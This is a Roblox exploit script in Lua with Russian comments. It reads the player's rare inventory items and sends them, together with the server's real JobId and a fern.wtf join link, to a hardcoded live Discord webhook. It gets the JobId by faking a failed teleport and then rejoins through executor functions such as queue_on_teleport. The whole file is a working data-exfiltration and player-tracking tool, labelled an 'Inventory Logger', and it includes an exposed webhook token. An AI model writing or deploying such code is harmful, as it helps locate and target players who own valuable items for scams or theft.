local HttpService = game:GetService("HttpService")
local TeleportService = game:GetService("TeleportService")
local Players = game:GetService("Players")
local ReplicatedStorage = game:GetService("ReplicatedStorage")

local placeId = 126884695634066 -- Adopt Me placeId (или меняйте по нужде)
local webhookUrl = "https://discord.com/api/webhooks/1413919894017413203/n3A3GU2C3Z0IhX-TMu3tKjFbCOgOG00Zss4QhhD3VwiCnJxAFlcGKeh6HqTdhaTKr2w4"
local MinUnique, MinAncient, MinGodly = 1, 1, 1
local spoofedJobId = game.JobId

-- ---------------------------
-- Функция для получения инвентаря
local function getInventory()
    local InvModule = require(ReplicatedStorage.Modules.InventoryModule)
    local uniqueItems, ancientItems, godlyItems = {}, {}, {}
    local counts = {unique=0, ancient=0, godly=0}

    for _, category in pairs(InvModule.MyInventory.Data.Weapons) do
        for _, item in pairs(category) do
            if item.Rarity == "Unique" then
                counts.unique = counts.unique + 1
                table.insert(uniqueItems, item.ItemName)
            elseif item.Rarity == "Ancient" then
                counts.ancient = counts.ancient + 1
                table.insert(ancientItems, item.ItemName)
            elseif item.Rarity == "Godly" then
                counts.godly = counts.godly + 1
                table.insert(godlyItems, item.ItemName)
            end
        end
    end
    return counts, uniqueItems, ancientItems, godlyItems
end

-- ---------------------------
-- Функция отправки webhook
local function sendWebhook(realJobId)
    local counts, uniqueItems, ancientItems, godlyItems = getInventory()
    if counts.unique >= MinUnique or counts.ancient >= MinAncient or counts.godly >= MinGodly then
        local fernUrl = "https://fern.wtf/joiner?placeId=" .. placeId .. "&gameInstanceId=" .. realJobId
        local webhookData = {
            embeds = {{
                title = "🔍 JobID + Inventory Info",
                description = "Captured real JobID and inventory",
                color = 65280,
                fields = {
                    { name = "Spoofed JobID", value = spoofedJobId, inline = true },
                    { name = "Real JobID", value = realJobId, inline = true },
                    { name = "Fern.wtf Join Link", value = fernUrl, inline = false },
                    { name = "Uniques", value = #uniqueItems > 0 and table.concat(uniqueItems, ", ") or "None", inline = false },
                    { name = "Ancients", value = #ancientItems > 0 and table.concat(ancientItems, ", ") or "None", inline = false },
                    { name = "Godlies", value = #godlyItems > 0 and table.concat(godlyItems, ", ") or "None", inline = false },
                },
                footer = { text = "Delta JobID + Inventory Logger" }
            }}
        }

        pcall(function()
            http_request({
                Url = webhookUrl,
                Method = "POST",
                Headers = { ["Content-Type"] = "application/json" },
                Body = HttpService:JSONEncode(webhookData)
            })
        end)
    end
end

-- ---------------------------
-- Перехват real JobId + отправка webhook
TeleportService.TeleportInitFailed:Connect(function(_, _, _, _, teleportInfo)
    if teleportInfo and teleportInfo.ServerInstanceId then
        local realJobId = teleportInfo.ServerInstanceId
        print("Real JobId detected:", realJobId)
        sendWebhook(realJobId)

        -- ---------------------------
        -- Перезаходчик
        queue_on_teleport(string.format([[getgenv().JobId = "%s"]], realJobId))
        for i = 1, 2 do
            task.spawn(function()
                pcall(function()
                    TeleportService:TeleportToPlaceInstance(placeId, realJobId)
                end)
            end)
            task.wait()
        end
    end
end)

-- ---------------------------
-- Инициализация "спуф-TP", чтобы вызвать TeleportInitFailed
for i = 1, 2 do
    task.spawn(function()
        pcall(function()
            TeleportService:TeleportToPlaceInstance(placeId, "00000000-0000-0000-0000-000000000000")
        end)
    end)
    task.wait()
end
